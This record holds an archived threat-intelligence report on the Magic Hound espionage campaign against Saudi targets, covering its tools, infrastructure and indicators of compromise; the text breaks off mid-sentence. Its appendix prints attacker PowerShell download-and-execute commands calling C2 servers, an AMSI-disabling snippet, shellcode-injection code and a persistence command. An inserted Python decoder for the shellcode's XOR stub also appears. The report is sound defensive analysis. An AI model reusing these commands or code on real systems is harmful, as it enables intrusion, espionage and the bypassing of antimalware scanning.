{
	"id": "4ab93e26-6855-447e-8253-7417c5566e81",
	"created_at": "2026-04-06T00:16:46.228844Z",
	"updated_at": "2026-04-10T03:37:55.914818Z",
	"deleted_at": null,
	"sha1_hash": "62318114dc658c48a61870c4062fd75a860f4f62",
	"title": "Magic Hound Campaign Attacks Saudi Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3424475,
	"plain_text": "Magic Hound Campaign Attacks Saudi Targets\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2017-02-15 · Archived: 2026-04-05 13:10:38 UTC\r\nUnit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016\r\nwhich we have named Magic Hound. This appears to be an attack campaign focused on espionage. Based upon our visibility\r\nit has primarily targeted organizations in the energy, government, and technology sectors that are either based or have\r\nbusiness interests in Saudi Arabia. The adversaries appear to have evolved their tactics and techniques throughout the\r\ntracked time-period, iterating through a diverse toolset across different waves of attacks. Link analysis of infrastructure and\r\ntools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA\r\nOperation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called\r\nNewscasters. Artifacts of this campaign was also recently published by Secureworks CTU.\r\nWe were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat\r\nintelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples\r\nthemselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others. It is believed the\r\nuse of specific tools may have coincided with specific attack waves by this adversary, with the most recent attacks using\r\nweaponized Microsoft Office documents with malicious macros. 
Due to the large amount of data collected, and limitations on attack telemetry, this blog will focus primarily on the most recent attacks occurring in the latter half of 2016.\r\nATTACK DETAILS\r\nThe samples initially collected and associated with Magic Hound were Microsoft Word and Excel documents containing embedded malicious macros. We were able to expand our data set by pivoting on infrastructure and tool behavior, which uncovered additional types of tools in use by Magic Hound, such as regular portable executable (PE) payloads, PE files compiled for the .NET Framework, various forms of IRC bots, and an open source fileless Python remote access tool called Pupy.\r\nThe weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names that resemble legitimate domain names in appearance. The two legitimate websites we were able to identify were owned by organizations in the government and energy sectors. Based on the existence of these malicious files on the legitimate websites, it is highly probable that the websites had already been compromised in some fashion. At the time of investigation, the files had already been removed from the websites. The two other delivery sites were ntg-sa[.]com, which may be trying to spoof a Saudi based information and communication technology conglomerate, and mol.com-ho[.]me, which may be trying to spoof the Ministry of Labor. A third delivery site was identified at its.com-ho[.]me, which appears to be a benign-looking domain. Several of these documents were also found on a seemingly unrelated, but benign-looking domain, briefl[.]ink.\r\nIt is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery mechanism. 
We were ultimately able to identify multiple organizations in the government, energy, and technology sectors targeted by Magic Hound.\r\nThe weaponized documents themselves all contained malicious macros which were designed to call Windows PowerShell to retrieve additional tools. A handful of lures with different themes were used repeatedly, with variations, throughout the eighteen collected documents. They ranged from documents masquerading as official Saudi government forms to a holiday greetings card. The forms masquerading as official government documents specifically used imagery from the Ministry of Health and the Ministry of Commerce, claiming to be mandatory forms that required macros to be enabled. Examples of the documents can be seen below:\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 1 of 20\r\nINFRASTRUCTURE\r\nAnalysis of the weaponized documents revealed some peculiarities right away. The majority of documents used the name “gerry knight” for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than domain names. These C2 servers also appeared to lack any relationships to each other and were hosted on a variety of VPS providers. Two of the Word documents using the “gerry knight” author name, however, were found to be communicating with C2 servers on two specific domains, www1.chrome-up[.]date and www3.chrome-up[.]date. Using these domains as pivot points, we were able to expand our data set. As seen below, the relational analysis proved to be quite fruitful:\r\nFigure 1 Overview of relationships\r\nWe rapidly discovered a different set of tools communicating with the exact same C2 servers as those two Word documents, in addition to other tools communicating with other subdomain variations of chrome-up[.]date, as seen in the following graphic:\r\nFigure 2 Command and control overlaps\r\nFrom there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads. What initially appeared to be a disparate and segregated attack campaign very rapidly proved to be a persistent and prolonged one with very specific goals in mind.\r\nIn total, we were able to collect over fifty different samples via infrastructure reuse, behavioral matching, and the reuse of a specific file for maintaining persistence. These tools included Microsoft Office documents, portable executables (PE), .NET Framework PE files, Meterpreter, IRC bots, an open source PowerShell shellcode-injection tool called Magic Unicorn, and an open source Python RAT called Pupy.\r\nInterestingly, as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK.\r\nFigure 3 Rocket Kitten and Magic Hound infrastructure overlap\r\nThe MPK bot is not publicly available and had previously been attributed to an adversary group called “Rocket Kitten”, which has often been thought to be a state sponsored adversary operating in the Middle East region. 
Although the likelihood of two different espionage-focused adversaries operating in the same geographical region sharing one specific IP and not being related somehow is fairly slim, due to limited telemetry we lack additional corroborating evidence of a conclusive relationship.\r\nMAGIC HOUND TOOLSET\r\nThe Magic Hound attacks did not rely on exploit code to compromise targeted systems, instead relying on executables and Microsoft Office documents, specifically Excel and Word documents containing malicious macros. During our analysis, we were able to determine the ultimate payload for several of these attacks. One payload was a Python based open source remote administration tool (RAT) called Pupy. A second payload was an IRC bot we have named MagicHound.Leash. We have also seen this group use the Magic Unicorn tool to generate a PowerShell script to deliver a shellcode-based payload. While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe that this group uses the script to deliver Metasploit's Meterpreter as a potential payload as well.\r\nWe have categorized the custom tools in use by the Magic Hound campaign into five categories, with corresponding names in Table 1. Additional details for these tools may be found in the appendix.\r\nTYPE                NAME\r\nDropper             MagicHound.DropIt\r\nExecutable Loader   MagicHound.Fetch\r\nDocument Loader     MagicHound.Rollover\r\nDownloader          MagicHound.Retriever\r\nIRC Bot             MagicHound.Leash\r\nTable 1 Types of MagicHound tools and their corresponding names\r\nMAGICHOUND.ROLLOVER\r\nThe Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or Meterpreter; we call these delivery documents MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execution of a string retrieved from the remote server. The second technique appeared to come from a tool called Magic Unicorn, an open source tool that wraps native shellcode in a PowerShell one-liner and is commonly used to deliver Metasploit payloads. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode”.\r\nMAGICHOUND.FETCH\r\nIn addition to loading payloads using macros within delivery documents, we observed the Magic Hound campaign using executables to load secondary payloads from a remote server. Both a custom developed loader, which we have named MagicHound.Fetch, and the default loader that comes with Pupy were found to be in use. The Fetch loader allowed us to use attributes within the loader to uncover more tools used by this group, which included a backdoor and an IRC bot.\r\nFetch first attempts to create persistent access to the targeted host, then retrieves a secondary payload from a remote server. To set up persistence, the loader writes a file to \"c:\\temp\\rr.exe\" and executes it with specific command line arguments to create auto run registry keys. All Fetch samples drop the exact same executable to set up persistence.\r\nMany of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES. However, they all used the same key \"agkrhfpdbvhdhrkj\", so a single key recovers the strings across the whole sample set. The loader's main goal was to run a PowerShell command to execute shellcode. We found the PowerShell command used by Fetch within the source code of Magic Unicorn, which was also used in the Magic Hound delivery documents. The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL:\r\nhxxp://www7.chrome-up[.]date/0m5EE\r\nWe were not able to retrieve the shellcode hosted at this URL. However, as alluded to above, we believe that this adversary used the open source Magic Unicorn tool to load a shellcode-based payload, which is likely to be Meterpreter.\r\nPUPY LOADER\r\nThe Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android. We have seen the Magic Hound campaign use both the 32-bit and 64-bit DLL loaders that come with Pupy to infect Windows systems. Analysis of their configurations shows that the C2 servers used both fully-qualified domain names and IP addresses. The configurations also show the use of the “obfs3” (The Threebfuscator) transport, an obfuscation layer that hides the true TCP-based communications protocol. obfs3 originates in the Tor project, and the specifics of this transport can be found at the Tor Project.\r\nMAGICHOUND.DROPIT\r\nThe Magic Hound campaign was also discovered using a custom dropper tool, which we have named MagicHound.DropIt. The DropIt Trojan we analyzed is an executable that builds another executable by decoding embedded blobs of base64 encoded data and concatenating them together in the correct order. In all of the DropIt samples we collected, the dropper then saves the executable to the user’s %TEMP% folder and executes the file.\r\nWe have also seen Magic Hound using DropIt as a binder, specifically dropping a legitimate decoy executable along with the malicious executable onto the target host. 
The legitimate decoy executable and the malicious executable are then both executed, with the malicious file running in the background and the decoy presented to the user. These types of tactics are generally used for evasion and to avoid arousing suspicion in the victim. In one example, the decoy executable was a legitimate Flash installer; from the victim’s perspective, they would therefore experience the expected behavior of a Flash installer.\r\nMAGICHOUND.RETRIEVER\r\nWe observed a DropIt sample installing another Trojan we call MagicHound.Retriever. At a high level, Retriever is a .NET downloader that retrieves secondary payloads using an embedded URL in its configuration as the C2. Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests resembling the example request in Figure 4.\r\nFigure 4 Retriever HTTP request sent to its C2 server\r\nMAGICHOUND.LEASH\r\nThe Magic Hound campaign was also discovered deploying an IRC bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications.\r\nLeash obtains its commands via private messages (PRIVMSG) sent from the adversary, who must also be connected to the IRC server. All of its available commands (see Appendix), except for the VER command seen in Figure 5, must be issued by individuals in the IRC channel with nicknames that start with \"AS_\" or \"AF_\".\r\nFigure 5 Leash bot responding to VER command\r\nThere are a great deal of similarities between the IRC bot originally discussed in iSight's NEWSCASTER whitepaper and Leash. iSight's whitepaper provided details on an IRC bot, which some refer to as Parastoo based on the password used to join the IRC channel, as seen in the following network traffic generated when each bot attempts to connect to its C2:\r\nParastoo Trojan:\r\nUSER AS_ # # :des\r\nNICK t__982\r\nJOIN :#tistani Parastoo\r\nMagicHound.Leash:\r\nUSER AS_a # # :des\r\nNICK Conroy\r\nJOIN :#kalk\r\nPerforming a binary diff revealed a 67% similarity between the Leash and Parastoo samples. In addition to sharing significant portions of code, both of the IRC bots require an IRC user's nickname to start with either \"AF_\" or \"AS_\" to run commands on the system. The two bots also have similar responses to \"VER\" commands, as seen in Figure 6 below, with the Parastoo responses differing only slightly from those generated by Leash.\r\nFigure 6 Parastoo Trojan responding to commands in similar manner to Leash\r\nMPKBot\r\nWe also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on. This MPK IRC bot is very similar to the MPK Trojan that used a custom C2 communications protocol, as detailed in a whitepaper by Check Point regarding a threat group called Rocket Kitten. We believe this version of the MPK Trojan is based on the same code base, as both the IRC version and the one referenced in the white paper have considerable similarities from a behavior standpoint as well as direct code overlap.\r\nCONCLUSION\r\nThe Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region. Organizations in the government, energy, and technology sectors have been targeted by this adversary, specifically organizations based in or doing business in Saudi Arabia. 
The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open source tools available to the general public. None of the tools we uncovered were found to be exploit-driven; they relied exclusively on social engineering tactics to compromise targets. While we did discover a potential relationship with the Rocket Kitten adversary group, we cannot confirm the extent of that relationship at this time, although we will continue to monitor the activities of Magic Hound.\r\nPalo Alto Networks customers are protected via the following:\r\nWildFire identification and detection of malicious samples\r\nCommand and control servers are classified as malicious\r\nAutoFocus tags have been created:\r\nMagic Hound\r\nMagicHound DropIt\r\nMagicHound Fetch\r\nMagicHound Retriever\r\nMagicHound Rollover\r\nMagicHound Leash\r\nMagicHound MPKBot\r\nPuPYRAT\r\nINDICATORS OF COMPROMISE\r\nMagicHound.DropIt SHA256\r\nc21074f340665935e6afe2a972c8d1ab517954e2dd05cc73e5ff0e8df587b99d\r\nea139a73f8ec75ea60dfa87027c7c3ef4ed61b45e1acb5d1650cc54e658984ba\r\nda2abdc951e4b2272fea5c8989debd22e26350bab4b4219104bccec5b8a7ff5a\r\n0d3ae682868cb3ff069ec52e1ffc5ef765453fd78e47b6366d96aebb09afd8ab\r\nf0ecc4388f0d84501499711681a64a74c5d95e0bb6a2174cbe3744bd5a456396\r\n860f4cd44371a180a99bc16526f54f8b051c420a3df334d05d569d0cdadac3d2\r\nb42b1186211633c2d47f3d815f0371ba234fee2ed0f26e487badc58e1ab81061\r\n4beee6e7aa244335e161fdc05296ea100090c2114b4ff2e782e3ee3e1f936fdf\r\n5e0e09c9860b293c4c9a2382a7392963adc54d6a23440abb9a2d89c50f8fd305\r\n3161f9087d89a2d036ea32741d5a006c6bb279d36ff8d1acde63f2e354f8c502\r\nMagicHound.Fetch PE SHA256\r\nb6c159cad5a867895fd41c103455cebd361fc32d047b573321280b1451bf151c\r\n6a7537f2cedbf453114cfba086e4746e698713777fb4fa4fc8964247dde741ed\r\n16d87fbd8667677da1af5433b6d797438f8dc0ab565fb40ecb29f83f148888cd\r\n92bc7d04445cf67aa7ddf15792cd62778d2d774d06616d1986f4c389b3d463f5\r\n86d3409c908f667dd298b6a7e1e17652bb29af73e7daed4a5e945fbdf742e9f4\r\nc3a8f5176351e87d28f45e58c79bb6646bb5d94ade7a24c6556514c860004143\r\na390365ddfcce146a8fa8435022f19b9a1be29f2b11a049cb660ec53f36beb06\r\nd2ffc757a12817e4b58b3d58d71da951b177dedd3f65ca41fad04a03fc63fac6\r\n79c9894b50cde62b182bd1560060c5c2bf5a1cef2b8afdffc4766e8c55ff6932\r\n2f7f3582504fbce349a6991fbb3b5f9577c5c014b6ce889b80d51977fa6fb31a\r\n8c2e4aa8d73ad2e48d70dfa18abea62769c7bef59c8c1607720f4f6162413f75\r\nabe8e86b787998a07411ee24f3f3d8a79e37c6da539650ceed566b081f968c26\r\n9e4d2e983f8a807f741f8873e6fa5d222dc6f3b358ccfc3a6c700398b342f656\r\ne57f77cc3d117923ec01aa0e044edc11b1042e57993ca7f74d971630893ca263\r\nca6e823dedd6ca5fada2b1fa63d0acb288027f5a3cdd2c60dcace3c424c5ced0\r\neaaecabb439c81e522d9f5681fdb047ee62381e763f0d9646e68cd507479ba5a\r\n1c3e527e496c4b0594a403d6d582bc6db3029d27369720d0d5122f862b10d8f1\r\n29a659fb0ef0262e4de0dc3c6a140677b6ddee13c1819b791bd280be0547e309\r\nMagicHound.Fetch PE C2\r\nservice.chrome-up[.]date\r\nwww3.chrome-up[.]date\r\nwww7.chrome-up[.]date\r\ntimezone[.]live\r\nservice1.chrome-up[.]date\r\n104.238.184[.]252\r\nwww5.chrome-up[.]date\r\nservicesystem.serveirc[.]com\r\nMagicHound.Fetch DOC SHA256\r\n218fac3d0639c0d762fcf71685bcf6b64c33d1533df03b4cf223d9b07ca1e3c2\r\ne5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6\r\n71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087\r\n388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d\r\n33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e\r\n5469facc266d5582bd387d69032a91c8fff373213b66a2f0852666e72bcdc1da\r\n528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62\r\n66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b\r\ncfce4827106c79a81eef6d3a0618c90bf5f15936036873573db76bed7e8a0864\r\n68db2b363a88b061cc9063535f3920673f1f08d985b14cb52b898ced6c0f8964\r\ne837f6b814c09900726dac2cf55f41babf361152875ba2a765a34ee5cc496087\r\nf912d40de9fe9a726448c1d84dfba2d4941f57210b2dbc035f5d34d68e8ac143\r\naf0ae0fa877f921d198239b7c722e12d14b2aa32fdfadaa37b47f558ae366de9\r\n6d1a50ca3e80442fa3e2caca86c166ed60bef32c2d0af7352cd227303cdec031\r\nMagicHound.Fetch DOC C2\r\n45.76.128[.]165\r\n139.59.46[.]154\r\n104.218.120[.]128\r\n89.107.62[.]39\r\n69.87.223[.]26\r\nanalytics-google[.]org\r\n89.107.60[.]11\r\nwww3.chrome-up[.]date\r\nwww.microsoftsubsystem.com-adm[.]in\r\nwww1.chrome-up[.]date\r\nMagicHound.Fetch XLS SHA256\r\n6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b\r\n97943739ccf8a00036dd3cdd0ba48e17a82ab9b65cc22c17c6e6258e72bb9ade\r\nMagicHound.Fetch XLS C2\r\n45.76.128[.]165\r\n139.59.46[.]154\r\nPupy Loaders SHA256\r\n7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73\r\ndb453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f\r\n82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190\r\nPupy Loaders C2\r\n139.59.46[.]154\r\nwww1.chrome-up[.]date\r\nMagicHound.Retriever SHA256\r\n1c550dc73b7a39b0cd21d3de7e6c26ece156253ac96f032efc0e7fcc6bc872ce\r\n7cdbf5c035a64cb6c7ee8c204ad42b4a507b1fde5e6708ea2486942d0d358823\r\nb2ea3fcd2bc493a5ac86e47029b076716ed22ef4487f9090f4aa1923a48015d6\r\n3f23972a0e80983351bedf6ad45ac8cd63669d3f1c76f8834c129a9e0418fff1\r\nMagicHound.Retriever C2\r\nservice.chrome-up[.]date\r\nmsservice[.]site\r\nmicrosoftexplorerservices[.]cloud\r\nMagicHound.Leash SHA256\r\n133959be8313a372f7a8d95762722a6ca02bc30aaffde0cbcf6ba402426d02f5\r\nba3560d3c789984ca29d80f0a2ea38a224e776087e0f28104569630f870adaf4\r\nd8731a94d17e0740184910ec81ba703bad5ff7afc92ba056f200533f668e07bf\r\nMagicHound.Leash C2\r\n45.56.123[.]129\r\nsyn.timezone[.]live\r\nMPKBot SHA256\r\nd08d737fa59edbea4568100cf83cff7bf930087aaa640f1b4edf48eea4e07b19\r\nMPKBot C2\r\n45.58.37[.]142\r\nAppendix\r\nMAGICHOUND.ROLLOVER\r\nThe Magic Hound campaign used Word and Excel documents as a delivery method, specifically documents that contain a malicious macro that attempts to load either the Pupy RAT or possibly Meterpreter. We call this tool MagicHound.Rollover. In one example, the Word document contained a button with the label “First click \"Enable Content\" above the page, then click here to fill out the form”.\r\nThis string attempts to trick the user into enabling macros so that the malicious code within the macro executes. When the macro executes, it unhides a table that contains the contents of a legitimate document in an attempt to make the user less suspicious of the malicious activity occurring in the background. The macro contains malicious code that attempts to download content from a remote server.\r\nThe macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques. The first technique is rather straightforward, using PowerShell’s \"iex\" (Invoke-Expression) alias to execute a string obtained from a remote server. 
The macro carries out this first technique by running the following command:\r\npowershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('hxxp://139.59.46[.]154:3485/eiloShaegae1')\"\r\nThe code above generates the following HTTP request, which the C2 server would then respond to with a script that PowerShell would execute:\r\nGET /eiloShaegae1 HTTP/1.1\r\nHost: 139.59.46[.]154:3485\r\nConnection: Keep-Alive\r\nThe second method involves using PowerShell to create a thread to execute a buffer of shellcode, which we believe the threat actors obtained from the Magic Unicorn source code. The Unicorn source code contains a comment for this specific PowerShell command, which is described as a “one line shellcode injection with native x86 shellcode”.\r\nThe shellcode begins with a stub that is responsible for decrypting additional shellcode. To decrypt the additional shellcode, the stub starts with an initial key, such as 0x6CAF9362, and XORs the first DWORD of the additional shellcode with it. It then adds the resulting (decrypted) DWORD to the key, uses the updated key to decrypt the second DWORD, and so on, so every DWORD depends on all of the plaintext before it. After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system. 
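The decryption loop described above is simple enough to reproduce, which is useful when a sample carries the stub but a sandbox never ran it. The following Python is an added example written for this page, not code from Unit 42 or from Metasploit: decode_feedback_xor implements the stub exactly as described (XOR each little-endian DWORD with the running key, then add the decoded DWORD to the key, modulo 2^32), and encode_feedback_xor is the inverse so the block can build its own test vector. The 21 sample bytes are constructed (they imitate the cld/call/pushad prologue of a Metasploit x86 stager) and the starting key 0x6CAF9362 is the example value quoted above; neither comes from a Magic Hound sample.

```python
import struct

MASK = 0xFFFFFFFF   # the stub does 32-bit arithmetic, so the key wraps


def _dwords(data):
    # The stub works on whole little-endian DWORDs; a ragged tail is zero-padded
    # here so that arbitrary input can be round-tripped.
    padded = data + bytes((-len(data)) % 4)
    return [struct.unpack_from('<I', padded, i)[0] for i in range(0, len(padded), 4)]


def decode_feedback_xor(encoded, key):
    # Decoding as the Rollover stub does it: plain = enc XOR key,
    # then key = key + plain (mod 2**32) before the next DWORD.
    out = bytearray()
    for enc in _dwords(encoded):
        plain = enc ^ key
        key = (key + plain) & MASK
        out += struct.pack('<I', plain)
    return bytes(out)


def encode_feedback_xor(plain, key):
    # Inverse transform, included only so the example can build its own test vector.
    out = bytearray()
    for dw in _dwords(plain):
        out += struct.pack('<I', dw ^ key)
        key = (key + dw) & MASK
    return bytes(out)


def first_dword(data):
    # Helper for hand-checking a single step of the stub.
    return int.from_bytes(data[:4], 'little')


# Constructed test vector: the initial key the report quotes, and 21 bytes that
# imitate the cld/call/pushad prologue of a Metasploit x86 stager (not bytes
# taken from a Magic Hound sample).
SAMPLE_KEY = 0x6CAF9362
SAMPLE_PLAIN = bytes.fromhex('fce8820000006089e531c0648b50308b520c8b5214')


def demo():
    enc = encode_feedback_xor(SAMPLE_PLAIN, SAMPLE_KEY)
    dec = decode_feedback_xor(enc, SAMPLE_KEY)
    return enc, dec


if __name__ == '__main__':
    enc, dec = demo()
    print('encoded:', enc.hex())
    print('decoded:', dec.hex())
    print('first encoded DWORD: 0x%08X' % first_dword(enc))
```

The stub carries its initial key as an immediate in its own code; pull that value before running the decoder, because a wrong key corrupts every DWORD and not just the first (the feedback propagates the error through the whole buffer).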
The assembly code used to create the shellcode can be obtained from:\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm\r\nThe purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL \"hxxp://45.76.128[.]165:4443/0w0O6\". We are unsure of the shellcode hosted at this URL, but it is possible that additional shellcode-based payloads like Meterpreter could have been served by this shellcode.\r\nTwo Rollover delivery documents (SHA256: 6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b and SHA256: 218fac3d0639c0d762fcf71685bcf6b64c33d1533df03b4cf223d9b07ca1e3c2) attempted to communicate with the URL hxxp://139.59.46[.]154:3485/eiloShaegae1 to obtain additional code to execute. On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:\r\npowershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZA\r\nAs you can see, the C2 server responds with a PowerShell command that will run on the system. The PowerShell command decodes to the following:\r\n$command = 'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlA\r\n        if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\r\n        {\r\n            $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $comm\r\n            IEX $exec\r\n        }\r\n        else\r\n        {\r\n            $exec = [System.Convert]::FromBase64String($command)\r\n            $exec = [Text.Encoding]::Unicode.GetString($exec)\r\n            IEX $exec\r\n        }\r\nThe script above checks the processor architecture: on an x64 host it relaunches the 32-bit PowerShell from SysWOW64 with the same encoded command (so that the rest of the chain runs in a 32-bit process), while on an x86 host it decodes the command in place with FromBase64String and runs it with IEX. Either way, the base64 encoded command decodes to the following:\r\n[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};\r\n    try{\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed',\r\n'NonPublic,Static').SetValue($null, $true)\r\n    }catch{}\r\n    IEX (New-Object Net.WebClient).DownloadString('hxxp://139.59.46[.]154:3485/IMo8oosieVai');\r\nThis decoded PowerShell script first disables TLS certificate validation for the session, then sets the non-public AmsiUtils.amsiInitFailed field to true so that the Antimalware Scan Interface (AMSI) stops scanning script content in that process, and finally attempts to download and execute a script over HTTP from the URL \"hxxp://139.59.46[.]154:3485/IMo8oosieVai\". The C2 server will respond to this HTTP GET request with a large amount of data that includes a PowerShell script that also contains a DLL payload, embedded as a series of base64 encoded chunks that are then decoded using the following code:\r\n$PEBytesTotal = [System.Convert]::FromBase64String($PEBytes0+$PEBytes1+$PEBytes2+$PEBytes3+$PEBytes4+$PEBytes5+$PEBytes6+$PEBytes7+$PEBytes\r\nThe PowerShell script loads the DLL payload directly into memory without saving it to the disk. 
The Pupy payload was\r\ngenerated using the following configuration, which shows the C2 IP/port and the use of the \"obfs3\" transport:\r\nLAUNCHER_ARGS=['--host', '139.59.46[.]154:3543', '-t', 'obfs3']\r\nIt appears the adversary used a majority of the following Pupy module to create the PowerShell commands used in the\r\ndelivery documents:\r\nhttps://github.com/n1nj4sec/Pupy/blob/master/Pupy/Pupylib/payloads/ps1_oneliner.py\r\nMAGICHOUND.FETCH\r\nThe custom loader Trojan used by this group, which we call MagicHound.Fetch is responsible for setting up persistent\r\naccess to the system and to reach out to a remote server to download and execute a secondary payload. To set up persistence,\r\nthe loader creates a folder named \"c:\\temp\", sets its attributes to be a hidden and system folder to hide the folder from view\r\nin Windows Explorer. It then writes a file named \"rr.exe\" (SHA256:\r\nf439dee4210d623b5aa7491bad8e8d9b43305f25a5d26940eb36f6460215cf8e) to this folder and executes it with specific\r\ncommand line arguments. During our analysis, we observed one loader running “rr.exe” with the following arguments:\r\nopen cmd.exe /c c:\\\\temp\\\\rr.exe SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\n\"C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\spp.exe\" iexplore\r\nThe \"rr.exe\" payload dropped to the system does nothing more than use the supplied command line arguments to create a\r\nregistry key to execute the payload each time the system starts. 
In the example above, the \"spp.exe\" executable would be\r\nadded to an auto-run registry key at:\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iexplore\r\nMany of the Fetch samples attempted to obfuscate their functionality by encrypting their embedded strings with AES using\r\nthe same key \"agkrhfpdbvhdhrkj\"; however, the loader's main goal involved running the following command:\r\n/c powershell -window hidden -EncodedCommand\r\nJAAwAG8AOABlACAAPQAgACcAJABmADkAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGw\r\nThe base64 encoded command decodes to the following:\r\n$0o8e = '$f9B = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,\r\nuint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $f9B -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z =\r\n\u0026lt;shellcode REDACTED for brevity\u0026gt;;$g = 0x1000;if ($z.Length -gt 0x1000){$g =\r\n$z.Length};$rJr=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]\r\n($rJr.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$rJr,0,0,0);for (;;){Start-sleep 60};';$e =\r\n[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($0o8e));$DKn = \"-enc\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 12 of 20\n\n\";if([IntPtr]::Size -eq 8){$b32 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";iex \"\u0026amp;\r\n$b32 $DKn $e\"}else{;iex \"\u0026amp; powershell $DKn $e\";}\r\nThe decoded command above builds a buffer that it uses to store shellcode and creates a thread to 
